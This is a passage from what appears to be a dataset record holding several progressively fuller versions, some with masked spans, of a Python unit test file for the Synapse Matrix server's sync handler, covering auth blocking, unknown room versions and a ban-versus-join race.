Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) ->None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user('creator', 'pass', admin=True)\n inviter_tok = self.login('@creator:test', 'pass')\n user = self.register_user('user', 'pass')\n tok = self.login('user', 'pass')\n requester = create_requester(user)\n initial_result = self.get_success(self.sync_handler.\n wait_for_sync_for_user(requester, sync_config=\n generate_sync_config(user, device_id='dev')))\n 
joined_room = self.helper.create_room_as(user, tok=tok)\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n knock_room = self.helper.create_room_as(inviter, room_version=\n RoomVersions.V7.identifier, tok=inviter_tok)\n self.helper.send_state(knock_room, EventTypes.JoinRules, {\n 'join_rule': JoinRules.KNOCK}, tok=inviter_tok)\n channel = self.make_request('POST', '/_matrix/client/r0/knock/%s' %\n (knock_room,), b'{}', tok)\n self.assertEqual(200, channel.code, channel.result)\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n for room_id in (joined_room, invite_room, knock_room):\n self.get_success(self.hs.get_datastores().main.db_pool.\n simple_update('rooms', keyvalues={'room_id': room_id},\n updatevalues={'room_version': 'unknown-room-version'}, desc\n ='updated-room-version'))\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n self.store._event_ref.clear()\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n 
self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) ->None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. 
the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n owner = self.register_user('alice', 'password')\n owner_tok = self.login(owner, 'password')\n room_id = self.helper.create_room_as(owner, is_public=True, tok=\n owner_tok)\n alice_sync_result: SyncResult = self.get_success(self.sync_handler.\n wait_for_sync_for_user(create_requester(owner),\n generate_sync_config(owner)))\n self.assertEqual(len(alice_sync_result.joined), 1)\n self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = alice_sync_result.joined[0\n ].timeline.events[-1].event_id\n eve = self.register_user('eve', 'password')\n eve_token = self.login(eve, 'password')\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(self.sync_handler\n .wait_for_sync_for_user(eve_requester, eve_sync_config))\n self.assertEqual(eve_sync_after_ban.joined, [])\n mocked_get_prev_events = patch.object(self.hs.get_datastores().main,\n 'get_prev_events_for_room', new_callable=AsyncMock,\n return_value=[last_room_creation_event_id])\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n eve_incremental_sync_after_join: SyncResult = self.get_success(self\n .sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=eve_sync_after_ban.next_batch))\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n eve_initial_sync_after_join: SyncResult = self.get_success(self.\n sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=None))\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n \"\"\"Tests Sync Handler.\"\"\"\n servlets = [admin.register_servlets, knock.register_servlets, login.\n register_servlets, room.register_servlets]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer\n ) ->None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) ->None:\n user_id1 = '@user1:test'\n user_id2 = '@user2:test'\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n self.reactor.advance(100)\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(self.sync_handler.wait_for_sync_for_user(requester,\n sync_config))\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n self.auth_blocking._hs_disabled = False\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) ->None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user('creator', 'pass', admin=True)\n inviter_tok = self.login('@creator:test', 'pass')\n user = self.register_user('user', 'pass')\n tok = self.login('user', 'pass')\n requester = create_requester(user)\n initial_result = self.get_success(self.sync_handler.\n wait_for_sync_for_user(requester, sync_config=\n generate_sync_config(user, 
device_id='dev')))\n joined_room = self.helper.create_room_as(user, tok=tok)\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n knock_room = self.helper.create_room_as(inviter, room_version=\n RoomVersions.V7.identifier, tok=inviter_tok)\n self.helper.send_state(knock_room, EventTypes.JoinRules, {\n 'join_rule': JoinRules.KNOCK}, tok=inviter_tok)\n channel = self.make_request('POST', '/_matrix/client/r0/knock/%s' %\n (knock_room,), b'{}', tok)\n self.assertEqual(200, channel.code, channel.result)\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n for room_id in (joined_room, invite_room, knock_room):\n self.get_success(self.hs.get_datastores().main.db_pool.\n simple_update('rooms', keyvalues={'room_id': room_id},\n updatevalues={'room_version': 'unknown-room-version'}, desc\n ='updated-room-version'))\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n self.store._event_ref.clear()\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n 
self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) ->None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. 
the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n owner = self.register_user('alice', 'password')\n owner_tok = self.login(owner, 'password')\n room_id = self.helper.create_room_as(owner, is_public=True, tok=\n owner_tok)\n alice_sync_result: SyncResult = self.get_success(self.sync_handler.\n wait_for_sync_for_user(create_requester(owner),\n generate_sync_config(owner)))\n self.assertEqual(len(alice_sync_result.joined), 1)\n self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = alice_sync_result.joined[0\n ].timeline.events[-1].event_id\n eve = self.register_user('eve', 'password')\n eve_token = self.login(eve, 'password')\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(self.sync_handler\n .wait_for_sync_for_user(eve_requester, eve_sync_config))\n self.assertEqual(eve_sync_after_ban.joined, [])\n mocked_get_prev_events = patch.object(self.hs.get_datastores().main,\n 'get_prev_events_for_room', new_callable=AsyncMock,\n return_value=[last_room_creation_event_id])\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n eve_incremental_sync_after_join: SyncResult = self.get_success(self\n .sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=eve_sync_after_ban.next_batch))\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n eve_initial_sync_after_join: SyncResult = self.get_success(self.\n sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=None))\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n<mask token>\n\n\ndef generate_sync_config(user_id: str, device_id: Optional[str]='device_id'\n ) ->SyncConfig:\n \"\"\"Generate a sync config (with a unique request key).\"\"\"\n global 
_request_key\n _request_key += 1\n return SyncConfig(user=UserID.from_string(user_id), filter_collection=\n Filtering(Mock()).DEFAULT_FILTER_COLLECTION, is_guest=False,\n request_key=('request_key', _request_key), device_id=device_id)\n",
"step-3": "<mask token>\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n \"\"\"Tests Sync Handler.\"\"\"\n servlets = [admin.register_servlets, knock.register_servlets, login.\n register_servlets, room.register_servlets]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer\n ) ->None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) ->None:\n user_id1 = '@user1:test'\n user_id2 = '@user2:test'\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n self.reactor.advance(100)\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(self.sync_handler.wait_for_sync_for_user(requester,\n sync_config))\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n self.auth_blocking._hs_disabled = False\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) ->None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user('creator', 'pass', admin=True)\n inviter_tok = self.login('@creator:test', 'pass')\n user = self.register_user('user', 'pass')\n tok = self.login('user', 'pass')\n requester = create_requester(user)\n initial_result = self.get_success(self.sync_handler.\n wait_for_sync_for_user(requester, sync_config=\n generate_sync_config(user, 
device_id='dev')))\n joined_room = self.helper.create_room_as(user, tok=tok)\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n knock_room = self.helper.create_room_as(inviter, room_version=\n RoomVersions.V7.identifier, tok=inviter_tok)\n self.helper.send_state(knock_room, EventTypes.JoinRules, {\n 'join_rule': JoinRules.KNOCK}, tok=inviter_tok)\n channel = self.make_request('POST', '/_matrix/client/r0/knock/%s' %\n (knock_room,), b'{}', tok)\n self.assertEqual(200, channel.code, channel.result)\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n for room_id in (joined_room, invite_room, knock_room):\n self.get_success(self.hs.get_datastores().main.db_pool.\n simple_update('rooms', keyvalues={'room_id': room_id},\n updatevalues={'room_version': 'unknown-room-version'}, desc\n ='updated-room-version'))\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n self.store._event_ref.clear()\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n 
self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) ->None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. 
the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n owner = self.register_user('alice', 'password')\n owner_tok = self.login(owner, 'password')\n room_id = self.helper.create_room_as(owner, is_public=True, tok=\n owner_tok)\n alice_sync_result: SyncResult = self.get_success(self.sync_handler.\n wait_for_sync_for_user(create_requester(owner),\n generate_sync_config(owner)))\n self.assertEqual(len(alice_sync_result.joined), 1)\n self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = alice_sync_result.joined[0\n ].timeline.events[-1].event_id\n eve = self.register_user('eve', 'password')\n eve_token = self.login(eve, 'password')\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(self.sync_handler\n .wait_for_sync_for_user(eve_requester, eve_sync_config))\n self.assertEqual(eve_sync_after_ban.joined, [])\n mocked_get_prev_events = patch.object(self.hs.get_datastores().main,\n 'get_prev_events_for_room', new_callable=AsyncMock,\n return_value=[last_room_creation_event_id])\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n eve_incremental_sync_after_join: SyncResult = self.get_success(self\n .sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=eve_sync_after_ban.next_batch))\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n eve_initial_sync_after_join: SyncResult = self.get_success(self.\n sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=None))\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n_request_key = 0\n\n\ndef generate_sync_config(user_id: str, device_id: Optional[str]='device_id'\n ) ->SyncConfig:\n \"\"\"Generate a sync config (with a unique request key).\"\"\"\n global 
_request_key\n _request_key += 1\n return SyncConfig(user=UserID.from_string(user_id), filter_collection=\n Filtering(Mock()).DEFAULT_FILTER_COLLECTION, is_guest=False,\n request_key=('request_key', _request_key), device_id=device_id)\n",
"step-4": "from typing import Optional\nfrom unittest.mock import AsyncMock, Mock, patch\nfrom twisted.test.proto_helpers import MemoryReactor\nfrom synapse.api.constants import EventTypes, JoinRules\nfrom synapse.api.errors import Codes, ResourceLimitError\nfrom synapse.api.filtering import Filtering\nfrom synapse.api.room_versions import RoomVersions\nfrom synapse.handlers.sync import SyncConfig, SyncResult\nfrom synapse.rest import admin\nfrom synapse.rest.client import knock, login, room\nfrom synapse.server import HomeServer\nfrom synapse.types import UserID, create_requester\nfrom synapse.util import Clock\nimport tests.unittest\nimport tests.utils\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n \"\"\"Tests Sync Handler.\"\"\"\n servlets = [admin.register_servlets, knock.register_servlets, login.\n register_servlets, room.register_servlets]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer\n ) ->None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) ->None:\n user_id1 = '@user1:test'\n user_id2 = '@user2:test'\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n self.reactor.advance(100)\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(self.sync_handler.wait_for_sync_for_user(requester,\n sync_config))\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n self.auth_blocking._hs_disabled = False\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n 
requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) ->None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user('creator', 'pass', admin=True)\n inviter_tok = self.login('@creator:test', 'pass')\n user = self.register_user('user', 'pass')\n tok = self.login('user', 'pass')\n requester = create_requester(user)\n initial_result = self.get_success(self.sync_handler.\n wait_for_sync_for_user(requester, sync_config=\n generate_sync_config(user, device_id='dev')))\n joined_room = self.helper.create_room_as(user, tok=tok)\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n knock_room = self.helper.create_room_as(inviter, room_version=\n RoomVersions.V7.identifier, tok=inviter_tok)\n self.helper.send_state(knock_room, EventTypes.JoinRules, {\n 'join_rule': JoinRules.KNOCK}, tok=inviter_tok)\n channel = self.make_request('POST', '/_matrix/client/r0/knock/%s' %\n (knock_room,), b'{}', tok)\n self.assertEqual(200, channel.code, channel.result)\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n for room_id in (joined_room, invite_room, knock_room):\n 
self.get_success(self.hs.get_datastores().main.db_pool.\n simple_update('rooms', keyvalues={'room_id': room_id},\n updatevalues={'room_version': 'unknown-room-version'}, desc\n ='updated-room-version'))\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n self.store._event_ref.clear()\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) ->None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. 
the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n owner = self.register_user('alice', 'password')\n owner_tok = self.login(owner, 'password')\n room_id = self.helper.create_room_as(owner, is_public=True, tok=\n owner_tok)\n alice_sync_result: SyncResult = self.get_success(self.sync_handler.\n wait_for_sync_for_user(create_requester(owner),\n generate_sync_config(owner)))\n self.assertEqual(len(alice_sync_result.joined), 1)\n self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = alice_sync_result.joined[0\n ].timeline.events[-1].event_id\n eve = self.register_user('eve', 'password')\n eve_token = self.login(eve, 'password')\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(self.sync_handler\n .wait_for_sync_for_user(eve_requester, eve_sync_config))\n self.assertEqual(eve_sync_after_ban.joined, [])\n mocked_get_prev_events = patch.object(self.hs.get_datastores().main,\n 'get_prev_events_for_room', new_callable=AsyncMock,\n return_value=[last_room_creation_event_id])\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n eve_incremental_sync_after_join: SyncResult = self.get_success(self\n .sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=eve_sync_after_ban.next_batch))\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n eve_initial_sync_after_join: SyncResult = self.get_success(self.\n sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=None))\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n_request_key = 0\n\n\ndef generate_sync_config(user_id: str, 
device_id: Optional[str]='device_id'\n ) ->SyncConfig:\n \"\"\"Generate a sync config (with a unique request key).\"\"\"\n global _request_key\n _request_key += 1\n return SyncConfig(user=UserID.from_string(user_id), filter_collection=\n Filtering(Mock()).DEFAULT_FILTER_COLLECTION, is_guest=False,\n request_key=('request_key', _request_key), device_id=device_id)\n",
"step-5": "# Copyright 2018 New Vector Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom typing import Optional\nfrom unittest.mock import AsyncMock, Mock, patch\n\nfrom twisted.test.proto_helpers import MemoryReactor\n\nfrom synapse.api.constants import EventTypes, JoinRules\nfrom synapse.api.errors import Codes, ResourceLimitError\nfrom synapse.api.filtering import Filtering\nfrom synapse.api.room_versions import RoomVersions\nfrom synapse.handlers.sync import SyncConfig, SyncResult\nfrom synapse.rest import admin\nfrom synapse.rest.client import knock, login, room\nfrom synapse.server import HomeServer\nfrom synapse.types import UserID, create_requester\nfrom synapse.util import Clock\n\nimport tests.unittest\nimport tests.utils\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n \"\"\"Tests Sync Handler.\"\"\"\n\n servlets = [\n admin.register_servlets,\n knock.register_servlets,\n login.register_servlets,\n room.register_servlets,\n ]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n\n # AuthBlocking reads from the hs' config on initialization. 
We need to\n # modify its config instead of the hs'\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) -> None:\n user_id1 = \"@user1:test\"\n user_id2 = \"@user2:test\"\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n\n self.reactor.advance(100) # So we get not 0 time\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n\n # Check that the happy case does not throw errors\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(\n self.sync_handler.wait_for_sync_for_user(requester, sync_config)\n )\n\n # Test that global lock works\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(\n self.sync_handler.wait_for_sync_for_user(requester, sync_config),\n ResourceLimitError,\n )\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n self.auth_blocking._hs_disabled = False\n\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n\n e = self.get_failure(\n self.sync_handler.wait_for_sync_for_user(requester, sync_config),\n ResourceLimitError,\n )\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) -> None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user(\"creator\", \"pass\", admin=True)\n inviter_tok = self.login(\"@creator:test\", \"pass\")\n\n user = self.register_user(\"user\", \"pass\")\n tok = self.login(\"user\", \"pass\")\n\n # Do an initial sync on a different device.\n requester = create_requester(user)\n initial_result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\"dev\")\n )\n )\n\n # Create a room as the user.\n joined_room = self.helper.create_room_as(user, tok=tok)\n\n # Invite the user to the room as someone 
